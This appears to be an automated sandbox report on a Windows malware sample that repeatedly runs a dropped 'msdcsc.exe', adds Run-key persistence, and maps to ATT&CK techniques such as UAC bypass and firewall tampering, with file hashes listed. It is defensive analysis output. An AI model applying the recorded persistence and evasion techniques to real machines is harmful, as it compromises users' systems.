C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7120
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:3872
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:6356
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4708
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:2380
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6544 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1968 -prefsLen 27097 -prefMapHandle 1972 -prefMapSize 270279 -ipcHandle 2060 -initialChannelId {2f0b9a0c-70c9-4bf4-b9bb-5b2f7df135f4} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu3⤵PID:2564
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2412 -prefsLen 27133 -prefMapHandle 2416 -prefMapSize 270279 -ipcHandle 2432 -initialChannelId {e87effb8-6f37-43a5-a7ab-9df5670ee3a8} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket3⤵
- Checks processor information in registry
PID:832
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3764 -prefsLen 27274 -prefMapHandle 3768 -prefMapSize 270279 -jsInitHandle 3772 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3780 -initialChannelId {885b880f-d199-4e92-a064-874565d3663c} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab3⤵
- Checks processor information in registry
PID:6760
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3764 -prefsLen 27274 -prefMapHandle 3820 -prefMapSize 270279 -ipcHandle 3968 -initialChannelId {c50c25cc-97cd-4ea2-9ed8-7186c4b174d8} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd3⤵PID:6976
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2748 -prefsLen 34773 -prefMapHandle 2916 -prefMapSize 270279 -jsInitHandle 2684 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3216 -initialChannelId {48d8d943-bba5-46c3-8590-e4fe81459862} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab3⤵
- Checks processor information in registry
PID:704
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4944 -prefsLen 35010 -prefMapHandle 4948 -prefMapSize 270279 -ipcHandle 4956 -initialChannelId {3e2d171f-9b06-4ab5-a8c5-95c80eeec73d} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility3⤵
- Checks processor information in registry
PID:5328
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5512 -prefsLen 33031 -prefMapHandle 5144 -prefMapSize 270279 -jsInitHandle 5148 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5140 -initialChannelId {513d5e97-1b89-42ea-ae7f-f5fafe499443} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab3⤵
- Checks processor information in registry
PID:1756
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5508 -prefsLen 33031 -prefMapHandle 5524 -prefMapSize 270279 -jsInitHandle 5732 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4640 -initialChannelId {ad7750d2-7bea-49f0-8630-2b56058d0ea6} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab3⤵
- Checks processor information in registry
PID:6960
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5928 -prefsLen 33031 -prefMapHandle 5932 -prefMapSize 270279 -jsInitHandle 5936 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5160 -initialChannelId {1e1f9268-fe20-4c9d-93d6-9d62ce909e00} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab3⤵
- Checks processor information in registry
PID:5876
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6388 -prefsLen 33071 -prefMapHandle 6384 -prefMapSize 270279 -jsInitHandle 6380 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6404 -initialChannelId {96cfffb2-960d-419e-bd2c-008ea0a47bcd} -parentPid 6544 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6544" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab3⤵
- Checks processor information in registry
PID:2420
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:5876
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
PID:6948
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:6732
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:8
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:3792
-
-
C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\wt.exe"C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Microsoft.WindowsTerminal_8wekyb3d8bbwe\wt.exe" -d "C:\Users\Admin\Desktop\."1⤵PID:1032
-
C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\WindowsTerminal.exewt.exe -d "C:\Users\Admin\Desktop\."2⤵
- Suspicious use of SetWindowsHookEx
PID:4316 -
C:\Windows\system32\wsl.exeC:\Windows\system32\wsl.exe --list3⤵PID:1740
-
-
C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\OpenConsole.exe"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\OpenConsole.exe" --headless --win32input --resizeQuirk --width 120 --height 27 --signal 0xa40 --server 0xa3c3⤵PID:5248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe3⤵PID:5216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:6156
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:6788
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:5700
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:6836
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:3008
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:6096
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:684
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:3352
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5444
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:7012
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:6900 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeb6efdcf8,0x7ffeb6efdd04,0x7ffeb6efdd102⤵PID:7136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2004,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2104 /prefetch:112⤵PID:6176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1928,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=1916 /prefetch:22⤵PID:5188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2344,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2320 /prefetch:132⤵PID:5324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3216,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3372 /prefetch:12⤵PID:1408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3340,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3452 /prefetch:12⤵PID:5656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4488,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4540 /prefetch:12⤵PID:6784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5144,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5160 /prefetch:142⤵PID:2640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5240,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5256 /prefetch:142⤵PID:6264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4308,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=5340 /prefetch:12⤵PID:5680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=212,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3372 /prefetch:142⤵PID:3012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5440,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3552 /prefetch:142⤵PID:3700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5160,i,10960085198270348775,3448876570567778906,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3464 /prefetch:142⤵PID:6608
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:3320
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:6020
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:7064
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5732
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:6612
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:5068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start1⤵PID:1392
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start2⤵PID:3300
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:2380
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:5832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:2112
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1872
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:2844
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4648
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:3892
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:3316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:2212
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:6080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:3576
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:6768
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:1380
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:1076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:4424
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:6632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:5012
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3896
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:4720
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7108
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:2848
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:6116
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:6832
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
PID:4768
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa38f9855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4708
Network
MITRE ATT&CK Enterprise v16
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
BITS Jobs
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1BITS Jobs
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
4Subvert Trust Controls
1SIP and Trust Provider Hijacking
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
86KB
MD50739a4b039910c9ecc48661e25279e6e
SHA102bf3b0265850bc13e85ac9bb421b88b6babbcaf
SHA2569df65940d3f2230b276e9ee989f15a94855e07cf2aa04210353f7a9e9a62db4a
SHA512e8a8876f4cfc2657e2b355b288fb8386e40131aeacc18aba1036ea5e60cf9a571f8da4ead987751db16fba5054d50b3dac9c399e5dff38fc64bf22c4fb3cb92f
-
Filesize
251KB
MD53a0071fc42e1305afa1bc5d3d8233068
SHA1711402cabd474d742d31509f17b26493683d61d3
SHA256d41679ada9aabdfd4a55f25a5721d6a5dfbdee53afcf0d1cf319276e28941afa
SHA5121a0b0bd341fe097f924517e8848d4012a93286402d79cdd67cf2cfc3225bd3785f81d329348ae1e0afc308ea98790dc89872f41cf3e9843a9481512832a403d8
-
Filesize
47KB
MD596da127f30d555f809b5a781eeadb5d4
SHA16742daf92406b52d5b98fcf3c8b96aca2f691404
SHA256f2e3e68a10f9f07b031e2fd3d7d73553ee4639a5e1c2a0775ac0a2ddbeff5e53
SHA5122c7f2d0bfb65e532f1c1068a93f92c2cd17682de70d8ee84cab47d3b3e80f87d97d16e0d41dee027f3381e5abe9d19f8b2604da7769d36243695be1d79b3be52
-
Filesize
209KB
MD5172214b69dfbf053c83ff8e6b70842bc
SHA102e321757925f21b18c96d2e23d6e9a755df59ab
SHA256da01598ba05a9467fa7cf76d9d212df75886eeeea30a633654dcdf29d8be90d9
SHA5126b02e7dffd64a8cc7b83e7dcbfbd8d4dfb99f7cc13d5056ffb00efb51f7cf0431bb270b8afa394dbeb4e7b3558261c0ea6bd3a542bd82afd9fbc9c5227f83a42
-
Filesize
79KB
MD53e8eacfdd72e4e808fb2d9be06062295
SHA108a4d5499eba45b9296a06e0685fcc4f3019677d
SHA256c35db544b76768114248d21450463e89e9b9949fbbccce96294cfa6932bcc1fd
SHA512e8bcf5ed5cd7ecfb24a8b08c517813719a039024fd18e3c4f1bfa3a682248537f7f3f7cd295f0b568d0c6db55656665502978eb56011d031b6c863a6f65785de
-
Filesize
40B
MD54186cadedb9492864e8b620ce6724b22
SHA13368c9e459f2e9b04eb7ef56cf85374a4184c9a8
SHA256a71ded28c714638e34099387ec6be13a343f06622d6f194ef9aab3cb6225f1b6
SHA512ad2e5a6c9497a2a240a3b74cb7d60552100d2524c5221b30265c4c34dcb20c6f447c6babe58262d9938fd8176260a072e33a2095b114c8d4121c2cd0e89636de
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\20a1cc1f-707b-4402-b4ff-9297b8d24e26.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
649B
MD51e73124227ff9b8d28ee13c4a1ab3dae
SHA15f6b20e8fc978266cab8a6f863badd6bf291c503
SHA25624028d5cf688caf959aa4f4bbd8a1b4f8d7a51b89c859a7ed80c75517a6ee1d2
SHA512a0f4df64ae0c0faa9fec04abd7ae878153c56fe232d56ecd2ac019f8e4bfc9ebb3c24cae44560d7e6b05dfa3bf8e8a9f8d0ac830d87bebaa156b6b9f31b5a48d
-
Filesize
270KB
MD5dc66a5b4c5453191f0f7913d5c690312
SHA11af88dbac3911bc86bffcf59c596753adc2a36d3
SHA256e24e08ef732410328cbfd07d4ce10fdc5af170a18587fcdb8f4dd87e25422a0d
SHA512653ce837032c824ca30c05da196552e90e3c7cd8b7c57a59bcc771796f3603fccde7d3f52549022ca6797fa9c95a37b51c67a30345dfc92e179e70c88195dffb
-
Filesize
23KB
MD5e1b3b5908c9cf23dfb2b9c52b9a023ab
SHA1fcd4136085f2a03481d9958cc6793a5ed98e714c
SHA256918b7dc3e2e2d015c16ce08b57bcb64d2253bafc1707658f361e72865498e537
SHA512b2da7ef768385707afed62ca1f178efc6aa14519762e3f270129b3afee4d3782cb991e6fa66b3b08a2f81ff7caba0b4c34c726d952198b2ac4a784b36eb2a828
-
Filesize
22KB
MD5716309aab2bca045f9627f63ad79d0bf
SHA138804233a29aaf975d557fe14e762c627bef76e0
SHA256115f6a626ca115d4ad5581b59275327e0e860b30330a52b0f785561332dd2429
SHA512adb0bc6cb9b230eda5dac7396a94a9a4dba9c8ba0b2eb73f5f21a20c3ca3d14651420bc6a17e67a71b5bba624f5a4e92d55cbbb898985dcca838184f6dfb2b15
-
Filesize
22KB
MD5de69cf9e514df447d1b0bb16f49d2457
SHA12ac78601179c3a63ba3f3f3081556b12ddcaf655
SHA256c447dd7677b419db7b21dbdfc6277c7816a913ffda76fd2e52702df538de0e49
SHA5124aebb7e54d88827d4a02808f04901c0d09b756c518202b056a6c0f664948f5585221d16967f546e064187c6545acef15d59b68d0a7a59897bd899d3e9dda37b1
-
Filesize
18KB
MD5539011b799990d9851f6350858332e47
SHA1b77fb9f82341e8c8cb65f65bd9273942556af38c
SHA256321eacf2b78212cb20ae3ebb27d35cc9b2c7ba8a9fa65ad8b7c292f826bf8099
SHA512499df1c11b0985636e0dca3057024033f23159de94bbc87d484189f50cb2fdd12ec3a5f03b4e7ca314f853d77b8e6fd21d0f83db579a1ae9674e1a038b15fa18
-
Filesize
1024KB
MD57ecb3029837da4312b2e35310bab2c7c
SHA16688a63bfdd106950fb54e5518d38e46894e856e
SHA25678b5fcb7ccb63678a552ca494edd8b4bf5ac474e15cf595a8d387ce2d4facfd2
SHA512d2607bf3cb9c75293d44d47dbc46084ca2894addce80c538cf6149e0de04d2f05716fd1b2a233122fdcdacf7a38b6aa2ab2ff0178092226cad22656fc85260fd
-
Filesize
71KB
MD59e73ed550a9adf585e8537d3675e5dae
SHA184729c7eb765af5098de2c58ba596b264beca266
SHA256707748a756056443a8dbcab4e312416a77cebfce4d799423abd7cc0f87a14026
